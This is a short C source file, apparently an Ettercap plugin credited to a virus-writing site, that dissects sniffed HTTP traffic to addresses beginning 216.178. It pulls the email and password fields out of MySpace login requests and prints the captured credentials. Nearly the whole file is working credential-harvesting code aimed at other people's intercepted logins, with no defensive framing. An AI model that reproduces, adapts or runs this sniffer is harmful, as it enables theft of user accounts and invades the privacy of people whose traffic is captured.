/* Ettercap dissector for myspace.com by WarGame - http://vx.netlux.org/wargamevx 
   You can contact me at wargame89@yahoo.it
*/

#include <ec.h>
#include <ec_decode.h>
#include <ec_dissect.h>
#include <ec_session.h>

FUNC_DECODER(dissector_myspace);
void myspace_init(void);
int CheckIfMyspace(char *ip);

void __init myspace_init(void)
{
   dissect_add("myspace", APP_LAYER_TCP, 80, dissector_myspace);
}

FUNC_DECODER(dissector_myspace)
{
   DECLARE_DISP_PTR_END(ptr, end);
   char *myspace_user,*myspace_pass,*tok;
   char tmp[MAX_ASCII_ADDR_LEN];

   /* skip empty packets (ACK packets) */
   if (PACKET->DATA.len == 0)
      return NULL;

   if(FROM_CLIENT("myspace", PACKET))
   {
      if((myspace_user = strstr(ptr,"Email_Textbox=")) && (myspace_pass = strstr(ptr,"Password_Textbox=")))
      {
     	 /* is it myspace.com? */
         if(CheckIfMyspace(ip_addr_ntoa(&PACKET->L3.dst, tmp)))
	 {
            myspace_user += 14;
            myspace_pass += 17;
	    PACKET->DISSECTOR.user = strdup(ec_strtok(myspace_user,"&",&tok));
            PACKET->DISSECTOR.pass = strdup(ec_strtok(myspace_pass,"&",&tok));
	    PACKET->DISSECTOR.info = strdup("myspace.com login");
	    DISSECT_MSG("MYSPACE : %s:%d -> USER:%s (%40 = @)  PASS:%s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp),
                                       ntohs(PACKET->L4.dst), 
                                       PACKET->DISSECTOR.user,
                                       PACKET->DISSECTOR.pass);
         }
            
      } 

      return NULL;
   }

   return NULL;

}   

/* check the first 2 octects */
int CheckIfMyspace(char *ip)
{
   if(strstr(ip,"216.178"))
   {
      return 1;
   }

   else
   {
      return 0;
   }
}